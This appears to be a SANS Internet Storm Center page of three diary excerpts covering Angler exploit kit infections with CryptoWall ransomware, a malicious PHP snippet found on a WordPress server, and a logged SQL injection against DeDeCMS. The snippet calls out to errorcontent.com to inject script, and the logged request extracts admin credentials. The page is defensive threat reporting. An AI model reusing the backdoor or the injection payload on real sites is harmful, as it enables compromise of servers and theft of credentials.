Category: SANS Internet Storm Center

Angler exploit kit pushing CryptoWall 3.0, (Thu, May 28th)

Introduction

In the past two days, I've infected two hosts from Angler exploit kit (EK) domains at 216.245.213.0/24. Both hosts were infected with CryptoWall 3.0 ransomware using the same bitcoin address for the ransom payment: 16Z6sidfLrfNoxJNu4qM5zhRttJEUD3XoB. On Tuesday, 2015-05-26 at 15:17 UTC, I infected a host where Angler EK sent Bedep as a malware payload before getting CryptoWall 3.0 [1].

Possible WordPress Botnet C&C: errorcontent.com, (Tue, May 26th)

Thanks to one of our readers for sending us this snippet of PHP he found on a WordPress server (I added some line breaks and comments for readability):

    #2b8008#
    /* turn off error reporting */
    @ini_set('display_errors'
    /* do not display errors to the user */
    $wp_mezd8610 = @$_SERVER['HTTP_USER_AGENT'];
    /* only run the code if this is Chrome or IE and not a bot */
    if ((preg_match('/Gecko|MSIE/i', $wp_mezd8610) && !preg_match('/bot/i', $wp_mezd8610))) {
        # Assemble a URL like http://errorcontent.com/content?ip=[client ip]&referer=[server host name]&ua=[user agent]
        $wp_mezd098610 = 'http://'.'error'.'content.'.'com/'.'content'.'/?'.'ip='.$_SERVER['REMOTE_ADDR'].'&referer='.urlencode($_SERVER['HTTP_HOST']).'&ua='
        # check if we have the curl extension installed
        if (function_exists('curl_init') && function_exists('curl_exec'
        # if we don't have curl, try file_get_contents, which requires allow_url_fopen
        elseif (function_exists('file_get_contents') && @ini_get('allow_url_fopen'
        # or try fopen as a last resort
        elseif (function_exists('fopen') && function_exists('stream_get_contents')) { $wp_8610mezd = @stream_get_contents(@fopen($wp_mezd098610, 'r')) } }
    if (substr($wp_8610mezd, 1, 3) === 'scr'
    # The data retrieved will be echoed back to the user if it starts with the string scr.

Lazy Coordinated Attacks Against Old Vulnerabilities, (Fri, May 22nd)

Typically we try to divide attackers into different groups, all the way from script kiddies (no resources, no skills, quite a bit of time/persistence) to more advanced state-sponsored attackers (lots of resources, decent skills, and the ability to conduct long-lasting persistent attacks). So it was a bit odd to see an attack against a rather old vulnerability in DeDeCMS.

The attack:

    GET /uploads/plus/search.php?keyword=11typeArr[%60@%27%60and%28SELECT1%20FROM%28selectcount%28*%29,concat%28floor%28rand%280%29*2%29,%28SELECT/*%27*/concat%280x5f,userid,0x5f,pwd,0x5f%29fromdede_adminLimit0,1%29%29afrominformation_schema.tables%20group%20by%20a%29b%29]=1 HTTP/1.1 301 178 – Python-urllib/2.7

DeDeCMS is a Drupal-like content management system popular in China [1].